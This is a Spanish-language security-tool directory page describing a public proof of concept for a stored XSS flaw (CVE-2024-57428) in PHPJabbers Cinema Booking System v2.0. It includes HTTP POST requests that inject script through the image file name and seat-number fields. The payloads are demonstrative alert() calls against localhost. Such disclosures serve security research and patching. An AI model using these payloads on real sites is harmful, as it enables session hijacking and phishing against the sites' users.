Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-57428 — CVE-2024-57428: PHPJabbers Cinema Booking System v2.0 sufre de XSS almacenado, lo que permite la inyección persistente de JavaScript para ataques de phishing y malware. | Kitploit
Herramientas/GitHubGitHub/ahrixia/cve-2024-57428
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPhishingPruebas de Penetración
GitHubahrixia/cve-2024-57428

CVE-2024-57428

CVE-2024-57428: PHPJabbers Cinema Booking System v2.0 sufre de XSS almacenado, lo que permite la inyección persistente de JavaScript para ataques de phishing y malware.

Ver Repositorio
hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-57428

Existe una vulnerabilidad de Cross-Site Scripting (XSS) almacenado en PHPJabbers Cinema Booking System v2.0 debido a la entrada sin sanitizar en los campos de subida de archivos (event_img, seat_maps) y en las configuraciones de numeración de asientos (number[new_X] en pjActionCreate). Los atacantes pueden inyectar JavaScript persistente, lo que puede derivar en phishing, inyección de malware y secuestro de sesión.

Parámetro vulnerable: event_img y seat_maps's file name

Impacto:

El XSS almacenado es más grave que el XSS reflejado, ya que afecta a todos los usuarios que acceden al contenido inyectado. Podría aprovecharse para ataques de phishing persistentes, robo de sesión o inyección de malware a una amplia base de usuarios.

Exploit - Prueba de Concepto (POC)

Cross-Site Scripting (XSS) Almacenado

XSS Almacenado en la Subida de Archivos

Payload: \">

root@kitploit:~
POST /CinemaBookingDev/index.php?controller=pjAdminEvents&action=pjActionCreate HTTP/1.1
Host: 127.0.0.1
Content-Length: 38611
[SNIP]


------WebKitFormBoundaryKOsvqJhAGpZAt33t
Content-Disposition: form-data; name="event_img"; filename="luffy.jpg\">"
Content-Type: image/jpeg

NÚMERO DE ASIENTOS DE LA SALA DE CINE

Payload: "><script>alert(x)</script>

root@kitploit:~
POST /CinemaBookingDev/index.php?controller=pjAdminVenues&action=pjActionCreate HTTP/1.1
Host: 127.0.0.1
Content-Length: 1812
[SNIP]


------WebKitFormBoundaryip9Mc6LkKna3bpSD
Content-Disposition: form-data; name="seats_count"

11
------WebKitFormBoundaryip9Mc6LkKna3bpSD
Content-Disposition: form-data; name="number[new_1]"

1"><script>alert(1)</script>1
------WebKitFormBoundaryip9Mc6LkKna3bpSD
Content-Disposition: form-data; name="number[new_2]"

2"><script>alert(2)</script>2
Descargar herramienta